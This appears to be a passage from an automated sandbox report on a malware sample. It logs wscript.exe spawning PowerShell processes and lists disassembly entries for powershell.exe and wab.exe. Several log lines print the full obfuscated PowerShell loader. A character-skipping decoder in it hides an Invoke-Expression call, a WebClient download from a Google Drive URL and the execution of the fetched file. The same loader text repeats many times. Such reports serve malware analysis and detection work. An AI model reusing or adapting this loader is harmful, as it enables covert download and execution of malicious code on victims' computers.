'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34625479 push ebp; iretd 8_2_00007FFD34625538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34626DCA push eax; iretd 8_2_00007FFD34626DCD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E1EC78 pushfd ; retf 11_2_04E1EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E10D48 push esi; retf 11_2_04E10D52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E11143 pushad ; retf 11_2_04E11151
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04E1115D pushad ; retf 11_2_04E11151
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_07CC1FB2 push eax; mov dword ptr [esp], ecx 11_2_07CC21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0896387D pushfd ; retf 11_2_08963881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_089636D9 push ebx; iretd 11_2_089636DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_089637B8 pushad ; retf 11_2_08963871
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481310 push cs; iretd 13_2_07481326
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07480313 push cs; iretd 13_2_07480326
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07483313 push cs; iretd 13_2_07483326
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481B16 push cs; iretd 13_2_07481B26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0747ED25 push cs; iretd 13_2_0747ED26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07482B23 push eax; iretd 13_2_07482B24
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07480525 push cs; iretd 13_2_07480526
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481525 push cs; iretd 13_2_07481526
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481D25 push cs; iretd 13_2_07481D26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07482041 pushfd ; retf 13_2_07482048
